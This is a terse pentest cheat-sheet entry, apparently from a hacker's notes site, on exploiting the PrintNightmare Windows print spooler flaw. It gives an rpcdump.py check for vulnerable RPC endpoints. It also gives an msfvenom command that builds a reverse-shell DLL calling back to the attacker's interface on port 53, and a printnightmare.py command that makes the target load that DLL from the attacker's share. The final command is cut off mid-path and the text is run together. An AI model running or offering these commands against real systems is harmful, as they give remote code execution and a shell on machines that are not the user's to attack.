Remote Procedure Call
Print Nightmare
rpcdump.py @$ip | egrep 'MS-RPRN|MS-PAR'If the output is the following contains the following, it is vulnerable.
Print System Aschronous Remote ProtocolPrint System Remote Protocolmsfvenom -p windows/x64/shell_reverse_tcp lhost=$tun0 lport=53 -f dll -o /opt/winreconpack/thescriptkid.dllpython3 printnightmare.py domain.local/user:password@$ip '\\$tun0\winreconpack\thescriptkLast updated